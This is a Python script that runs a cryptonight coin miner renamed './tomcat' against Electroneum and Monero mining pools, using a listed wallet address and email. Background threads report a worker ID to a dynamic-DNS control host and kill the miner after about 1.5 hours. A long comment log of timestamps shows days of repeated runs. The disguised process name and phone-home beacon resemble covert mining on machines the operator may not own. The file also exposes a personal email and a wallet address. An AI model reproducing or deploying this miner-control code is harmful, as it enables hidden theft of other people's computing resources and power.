import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:07:06.322806
#2018-02-17 16:53:03.510606
#2018-02-17 18:42:01.962946
#2018-02-17 20:29:04.869036
#2018-02-17 22:15:01.610921
#2018-02-17 23:59:01.574638
#2018-02-18 01:50:01.410704
#2018-02-18 03:37:02.196044
#2018-02-18 05:24:01.815667
#2018-02-18 07:16:06.624172
#2018-02-18 09:03:03.461017
#2018-02-18 10:49:07.625147
#2018-02-18 12:34:04.887178
#2018-02-18 14:21:04.541882
#2018-02-18 16:12:08.065046
#2018-02-18 18:00:05.929689
#2018-02-18 19:47:01.639328
#2018-02-18 21:32:05.619036
#2018-02-18 23:21:05.976217
#2018-02-19 01:07:06.538089
#2018-02-19 02:53:04.993253
#2018-02-19 04:41:07.849882
#2018-02-19 06:25:06.808992
#2018-02-19 08:14:04.183197
#2018-02-19 10:04:07.109964
#2018-02-19 11:53:09.649422
#2018-02-19 13:40:07.909475
#2018-02-19 15:29:06.000148
#2018-02-19 17:17:05.739143
#2018-02-19 19:05:04.162061
#2018-02-19 20:50:01.292239
#2018-02-19 22:39:07.488273
#2018-02-20 00:24:08.003436
#2018-02-20 02:11:01.840476
#2018-02-20 04:03:06.670675
#2018-02-20 05:46:07.542653
#2018-02-20 07:32:07.580323
#2018-02-20 09:17:05.863728
#2018-02-20 11:01:06.305576
#2018-02-20 12:48:04.168602
#2018-02-20 14:32:01.481047
#2018-02-20 16:18:06.553988
#2018-02-20 18:06:11.516614
#2018-02-20 19:56:04.495623
#2018-02-20 21:45:08.072702
#2018-02-20 23:25:08.015253
#2018-02-21 01:11:05.172582
#2018-02-21 02:57:04.727502
#2018-02-21 04:47:05.863211
#2018-02-21 06:34:07.813565
#2018-02-21 08:19:07.620804
#2018-02-21 10:06:05.160633
#2018-02-21 11:56:04.088424
#2018-02-21 13:46:11.859107
#2018-02-21 15:31:05.826065
#2018-02-21 17:21:05.180022
#2018-02-21 19:10:10.948411
#2018-02-21 20:57:05.646935
#2018-02-21 22:45:09.582297
#2018-02-22 00:36:04.267880
#2018-02-22 02:25:09.557933
#2018-02-22 04:12:07.836083
#2018-02-22 05:57:05.674755
#2018-02-22 07:45:07.057925
#2018-02-22 09:35:09.593197
#2018-02-22 11:22:04.407482
#2018-02-22 13:09:01.593938
#2018-02-22 14:58:09.419526
#2018-02-22 16:43:07.741601
#2018-02-22 18:28:08.410013
#2018-02-22 20:22:07.994516
#2018-02-22 22:10:06.686409
#2018-02-22 23:57:04.283700
#2018-02-23 01:46:01.806668
#2018-02-23 03:31:06.634668
#2018-02-23 05:16:05.213953
#2018-02-23 07:01:01.694641
#2018-02-23 08:51:04.087790
#2018-02-23 11:09:02.230934
#2018-02-23 13:04:10.321827
#2018-02-23 14:49:08.377902
#2018-02-23 16:39:08.350079
#2018-02-23 18:25:04.128510
#2018-02-23 20:11:01.652673
#2018-02-23 22:00:08.560726
#2018-02-23 23:48:08.274890
#2018-02-24 01:39:05.794148
#2018-02-24 03:28:06.954573
#2018-02-24 05:13:06.093986
#2018-02-24 07:01:03.991909
#2018-02-24 08:35:05.849165
#2018-02-24 10:08:01.505457
#2018-02-24 11:52:06.243776
#2018-02-24 13:19:06.816698
#2018-02-24 14:50:06.020490
#2018-02-24 16:22:07.627750
#2018-02-24 18:01:05.173912
#2018-02-24 19:29:04.303636
#2018-02-24 21:06:05.626272
#2018-02-24 23:08:07.154939
#2018-02-25 01:31:04.988974
#2018-02-25 05:24:02.145458
#2018-02-25 11:34:07.970091